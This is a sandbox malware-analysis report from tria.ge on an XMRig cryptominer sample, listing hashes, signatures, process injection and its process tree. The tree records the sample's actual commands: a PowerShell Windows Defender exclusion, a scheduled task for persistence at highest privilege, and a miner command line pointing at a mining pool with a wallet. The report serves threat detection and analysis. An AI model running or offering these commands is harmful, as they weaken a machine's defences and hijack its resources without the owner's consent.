Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
69s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
06/02/2023, 13:10
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.9MB
-
MD5
d1949ae00330d3c0f7cc282d2f6952cc
-
SHA1
f94a50cdd1aff1fe2f7f4135647df2a680ac3e79
-
SHA256
0f1f360e32236b3af68ae241d8604a202c3de6d93603163d2af21364263fceb7
-
SHA512
0f1499ee262e56c4771490fee60c4d76ba8625b6b5004ca73be437c6f17e5a358237c03fc78da07c6a7043ef52252f73cdadd4635c5eef38dbe5cc3fd36b2730
-
SSDEEP
24576:Nx2pKMUGjuNYmUeV5CMl307hOhkMIIj0VOyp2VmmBgbc2vLmmsanDJY++JyBBT9:Nx4U2mV6MV28m9vF2/2c29YjyBBx
Malware Config
Signatures
-
XMRig Miner payload 14 IoCs
resource yara_rule behavioral1/memory/376-103-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-105-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-107-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-108-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-110-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-112-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-113-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-115-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-118-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/376-117-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-120-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-122-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/376-124-0x0000000000000000-0x0000000001000000-memory.dmp xmrig behavioral1/memory/376-126-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/616-70-0x00000000010E0000-0x00000000012BE000-memory.dmp net_reactor behavioral1/memory/616-123-0x00000000010E0000-0x00000000012BE000-memory.dmp net_reactor behavioral1/memory/376-124-0x0000000000000000-0x0000000001000000-memory.dmp net_reactor -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 616 set thread context of 376 616 file.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 616 file.exe 664 powershell.exe 616 file.exe 616 file.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 616 file.exe Token: SeDebugPrivilege 664 powershell.exe Token: SeLockMemoryPrivilege 376 vbc.exe Token: SeLockMemoryPrivilege 376 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 376 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 616 wrote to memory of 664 616 file.exe 28 PID 616 wrote to memory of 664 616 file.exe 28 PID 616 wrote to memory of 664 616 file.exe 28 PID 616 wrote to memory of 1536 616 file.exe 30 PID 616 wrote to memory of 1536 616 file.exe 30 PID 616 wrote to memory of 1536 616 file.exe 30 PID 1536 wrote to memory of 1544 1536 cmd.exe 32 PID 1536 wrote to memory of 1544 1536 cmd.exe 32 PID 1536 wrote to memory of 1544 1536 cmd.exe 32 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34 PID 616 wrote to memory of 376 616 file.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"3⤵
- Creates scheduled task(s)
PID:1544
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:376
-